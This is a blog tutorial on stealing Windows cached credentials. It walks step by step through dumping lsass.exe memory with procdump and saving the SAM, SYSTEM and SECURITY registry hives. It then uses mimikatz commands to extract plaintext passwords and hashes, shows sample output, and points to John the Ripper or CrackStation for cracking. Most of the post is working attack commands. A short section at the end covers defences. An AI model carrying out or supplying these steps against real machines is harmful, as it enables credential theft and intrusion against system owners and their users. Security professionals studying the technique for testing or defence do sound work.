All Linux HowTo's Security HowTo's Windows HowTo's

Get and Crack Windows Cached Credentials

This article explains how to extract various Windows dumps of passwords from a target system. To follow along with this article, you’ll need to have administrative access to the target Windows machine, and any endpoint security will need to be tolerant of your activities. Any good AV will likely prevent this activity. Well, it should. If not, use something else. BitDefender, CrowedStrike and Windows Defender prevent these attack types – as well as patching the target Windows machine and ensuring limited access to administrative privileges.

This article gives an example of retrieving those credentials for analysis. This might include cracking the hashes.

We’ll keep it simple and assume the following:

  1. You have Administrator access to the target machine.
  2. You’re able to log into the target machine.
  3. The target machine is Windows 10 Pro.
  4. The local antivirus is permissive of this effort.

Get the password databases

Dump the lsass.exe memory

Our first step is to get SysInternals tools available to us. We can map to this as follows:

net use S: https://live.sysinternals.com/tools

Now we have access to the tools we need. Dump the “lsass.exe” process memory to file:

S:\procdump -accepteula -ma lsass.exe C:\Users\MyUser\lsass.dmp

This process can (but shouldn’t) take a long time to complete. It can also hang the target machine so be careful when doing it over an RDP session.

We no longer need the SysInternals (S: Drive) so remove it:

net use S: /DELETE

Dump the local registry database

Now we can dump the local password database. This isn’t related to lsass.exe memory dump. This is just additional hashes we can harvest.

reg save hklm\sam c:\sam.dump
reg save hklm\system c:\system.dump
reg save hklm\security c:\security.dump

The result of the above two commands is two files we can interrogate for password hashes. These two files go together and have nothing to do with the “lsass.exe” memory dump we did earlier. It’s just a matter of getting as much as we can to work with.

At this point we have the cached passwords from “lsass.exe” and the file “security”, “sam” and “system” dump files.

Extract the hashes and passwords

Once the above dumping is complete, we need to extract the hashes. We’ll use “mimikatz” for this. Download it from:

https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20210709/mimikatz_trunk.zip

Extract the archive. Now you should be able to find the executable “mimikatz.exe” file.

  .#####.   mimikatz 2.2.0 (x64) #19041 Sep 18 2020 19:18:29
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz #

To extract hashes from the local password dump (the “system” and “security” dump files):

log hash2.txt
privilege::debug
lsadump::secrets /system:c:\system.dump /security:c:\security.dump /sam:c:\sam.dump

The output will include something like this:

Local name : COMPUTERNAME ( S-1-2-3-4-5-6-7-8-9-0 )
Domain name : SOMETHING ( S-1-2-3-4-5-6-7-8-9-0 )
Domain FQDN : SOMETHING

Secret  : SOMETHING
cur/text: MyClearTextPassword
old/text: MyClearTextPassword

Secret  : SOMETHING
Secret  : _SOMETHING/ service 'SOMETHING' with username : .\SOMETHING
cur/text: MyClearTextPassword
mimikatz #

We can see a few clear text passwords in the above output.

To extract passwords from the “lsass.exe” memory dump – while still in mimikatz:

sekurlsa::minidump C:\Users\MyUser\lsass.dmp
sekurlsa::logonPasswords

Here’s a sample of the output:

mimikatz # sekurlsa::minidump C:\Users\MyUser\lsass.dmp
Switch to MINIDUMP : 'C:\Users\MyUser\lsass.dmp'

mimikatz # sekurlsa::logonPasswords
Opening : 'C:\Users\MyUser\lsass.dmp' file for minidump...

Authentication Id : 0 ; 1658638 (00000000:000000f0e)
Session           : Interactive from 1
User Name         : MyUserName
Domain            : AzureAD
Logon Server      : (null)
Logon Time        : 20/07/2021 8:58:10 AM
SID               : S-1-2-3-4-5-6-7-8-9-0
        msv :
        tspkg :
        wdigest :
         * Username : myuser.email@example.com
         * Domain   : AzureAD
         * Password : (null)
        kerberos :
         * Username : myuser.email@example.com
         * Domain   : AzureAD
         * Password : (null)
        ssp :
         [00000000]
         * Username : myuser@some.domain.example.com
         * Domain   : (null)
         * Password : MyPasswordInClearText
        credman :
         [00000000]
         * Username : WORKGROUP\myuser
         * Domain   : 10.1.2.3
         * Password : MyPasswordInClearText
        cloudap

The most interesting output in the above sample is “Password :”. These are in plain text.

You can take the hashes and run them through John (JTR) or submit them to “https://crackstation.net”.

Protecting against this attack

This attack aims to retrieve the various password caches on a Windows machine. Prevent SysInternals from being installed on the machine as a matter of policy. Good end-point security will prevent access to the “lsass.exe” memory and the execution of “mimikatz”. The attacker might try to use the “net use” to get SysInternals to bypass the policy of no SysInternals being installed on a machine. And the need for “mimikatz” can be skipped by copying the dumps to an external computer that the attack controls. Still, the attacker needs administrative privileges on the target windows machine to access the memory and registry keys. Preventing normal users from administrative access, and ensuring the windows machine is up to date with security features enabled will go a long way to preventing this attack.

Similar Posts:

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.